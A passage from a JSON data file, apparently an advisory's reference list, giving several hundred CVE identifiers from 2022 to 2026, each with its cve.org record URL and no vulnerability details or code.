"name": "CVE-2023-54053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54053"
},
{
"name": "CVE-2022-50843",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50843"
},
{
"name": "CVE-2022-50769",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50769"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2025-40205",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40205"
},
{
"name": "CVE-2023-54295",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54295"
},
{
"name": "CVE-2022-50752",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50752"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2025-40033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40033"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68215"
},
{
"name": "CVE-2022-50253",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50253"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-54223",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54223"
},
{
"name": "CVE-2023-53418",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53418"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2022-50716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50716"
},
{
"name": "CVE-2025-40075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40075"
},
{
"name": "CVE-2022-50698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50698"
},
{
"name": "CVE-2022-50844",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50844"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2025-68330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68330"
},
{
"name": "CVE-2023-54101",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54101"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2022-50773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50773"
},
{
"name": "CVE-2022-50758",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50758"
},
{
"name": "CVE-2022-50848",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50848"
},
{
"name": "CVE-2025-68180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68180"
},
{
"name": "CVE-2024-36348",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36348"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2022-50662",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50662"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2023-54243",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54243"
},
{
"name": "CVE-2025-68201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68201"
},
{
"name": "CVE-2023-54078",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54078"
},
{
"name": "CVE-2022-50819",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50819"
},
{
"name": "CVE-2025-40289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40289"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2023-54102",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54102"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-40292",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40292"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-54093",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54093"
},
{
"name": "CVE-2023-53839",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53839"
},
{
"name": "CVE-2023-53752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53752"
},
{
"name": "CVE-2023-53802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53802"
},
{
"name": "CVE-2022-50887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50887"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2023-54318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54318"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2022-50757",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50757"
},
{
"name": "CVE-2022-0854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0854"
},
{
"name": "CVE-2022-50827",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50827"
},
{
"name": "CVE-2025-68252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68252"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
{
"name": "CVE-2025-40274",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40274"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-53820",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53820"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2023-54225",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54225"
},
{
"name": "CVE-2025-40206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40206"
},
{
"name": "CVE-2022-50679",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50679"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-68237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68237"
},
{
"name": "CVE-2023-54194",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54194"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-21760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21760"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2024-26832",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26832"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-39788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39788"
},
{
"name": "CVE-2022-50839",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50839"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2023-54301",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54301"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2023-53843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53843"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-68194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68194"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2022-50744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50744"
},
{
"name": "CVE-2025-40109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40109"
},
{
"name": "CVE-2023-54277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54277"
},
{
"name": "CVE-2025-40006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40006"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-40038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40038"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-39805",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39805"
},
{
"name": "CVE-2023-54046",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54046"
},
{
"name": "CVE-2025-40263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40263"
},
{
"name": "CVE-2022-50717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50717"
},
{
"name": "CVE-2023-54120",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54120"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2025-68244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68244"
},
{
"name": "CVE-2025-40231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40231"
},
{
"name": "CVE-2022-50742",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50742"
},
{
"name": "CVE-2025-40278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40278"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2025-40176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40176"
},
{
"name": "CVE-2023-53783",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53783"
},
{
"name": "CVE-2025-40342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40342"
},
{
"name": "CVE-2023-54028",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54028"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2022-50722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50722"
},
{
"name": "CVE-2022-50709",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50709"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2022-50728",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50728"
},
{
"name": "CVE-2022-50677",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50677"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2025-68222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68222"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2023-54003",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54003"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2024-46854",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46854"
},
{
"name": "CVE-2023-54291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54291"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2025-40279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40279"
},
{
"name": "CVE-2023-53865",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53865"
},
{
"name": "CVE-2025-68328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68328"
},
{
"name": "CVE-2023-53744",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53744"
},
{
"name": "CVE-2023-53178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53178"
},
{
"name": "CVE-2023-23559",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23559"
},
{
"name": "CVE-2023-53823",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53823"
},
{
"name": "CVE-2022-50718",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50718"
},
{
"name": "CVE-2022-50658",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50658"
},
{
"name": "CVE-2023-54009",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54009"
},
{
"name": "CVE-2023-54023",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54023"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2022-50660",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50660"
},
{
"name": "CVE-2025-68744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68744"
},
{
"name": "CVE-2024-50143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50143"
},
{
"name": "CVE-2023-54241",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54241"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2023-54017",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54017"
},
{
"name": "CVE-2025-40183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40183"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2023-53787",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53787"
},
{
"name": "CVE-2022-50886",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50886"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-68172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68172"
},
{
"name": "CVE-2023-54097",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54097"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2022-50626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50626"
},
{
"name": "CVE-2025-40338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40338"
},
{
"name": "CVE-2022-50767",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50767"
},
{
"name": "CVE-2025-40134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40134"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2023-54154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54154"
},
{
"name": "CVE-2022-50880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50880"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2023-54141",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54141"
},
{
"name": "CVE-2022-50885",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50885"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2022-49980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49980"
},
{
"name": "CVE-2023-53840",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53840"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2023-53785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53785"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2025-37916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37916"
},
{
"name": "CVE-2025-38111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38111"
},
{
"name": "CVE-2022-50661",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50661"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2023-54263",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54263"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40283"
},
{
"name": "CVE-2023-54284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54284"
},
{
"name": "CVE-2025-40324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40324"
},
{
"name": "CVE-2023-54181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54181"
},
{
"name": "CVE-2025-68378",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68378"
},
{
"name": "CVE-2022-50824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50824"
},
{
"name": "CVE-2025-71141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71141"
},
{
"name": "CVE-2025-38359",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38359"
},
{
"name": "CVE-2025-40177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40177"
},
{
"name": "CVE-2023-53795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53795"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2022-50623",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50623"
},
{
"name": "CVE-2025-40250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40250"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-53788",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53788"
},
{
"name": "CVE-2025-40074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40074"
},
{
"name": "CVE-2025-40321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40321"
},
{
"name": "CVE-2025-40116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40116"
},
{
"name": "CVE-2023-53215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53215"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68249"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2022-50864",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50864"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-40179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40179"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2023-53832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53832"
},
{
"name": "CVE-2025-40127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40127"
},
{
"name": "CVE-2025-40282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40282"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2022-50715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50715"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2023-54210",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54210"
},
{
"name": "CVE-2025-40053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40053"
},
{
"name": "CVE-2022-50735",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50735"
},
{
"name": "CVE-2023-54030",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54030"
},
{
"name": "CVE-2025-40120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40120"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2023-53997",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53997"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-40098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40098"
},
{
"name": "CVE-2025-40129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40129"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2023-54015",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54015"
},
{
"name": "CVE-2025-40301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40301"
},
{
"name": "CVE-2025-40040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40040"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2023-54224",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54224"
},
{
"name": "CVE-2023-54235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54235"
},
{
"name": "CVE-2023-54122",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54122"
},
{
"name": "CVE-2023-54119",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54119"
},
{
"name": "CVE-2025-40207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40207"
},
{
"name": "CVE-2022-50675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50675"
},
{
"name": "CVE-2023-54159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54159"
},
{
"name": "CVE-2022-50751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50751"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54245",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54245"
},
{
"name": "CVE-2023-54032",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54032"
},
{
"name": "CVE-2023-54168",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54168"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2023-53856",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53856"
},
{
"name": "CVE-2025-40318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40318"
},
{
"name": "CVE-2022-50889",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50889"
},
{
"name": "CVE-2023-54146",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54146"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2023-54118",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54118"
},
{
"name": "CVE-2025-40118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40118"
},
{
"name": "CVE-2023-53782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53782"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2023-54069",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54069"
},
{
"name": "CVE-2022-50699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50699"
},
{
"name": "CVE-2025-40157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40157"
},
{
"name": "CVE-2022-49943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49943"
},
{
"name": "CVE-2023-53990",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53990"
},
{
"name": "CVE-2025-40021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40021"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2023-54027",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54027"
},
{
"name": "CVE-2022-50870",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50870"
},
{
"name": "CVE-2025-68734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68734"
},
{
"name": "CVE-2023-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54058"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2023-53417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53417"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2023-53851",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53851"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-40044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40044"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2023-54311",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54311"
},
{
"name": "CVE-2025-40105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40105"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-54126",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54126"
},
{
"name": "CVE-2023-53841",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53841"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54267"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
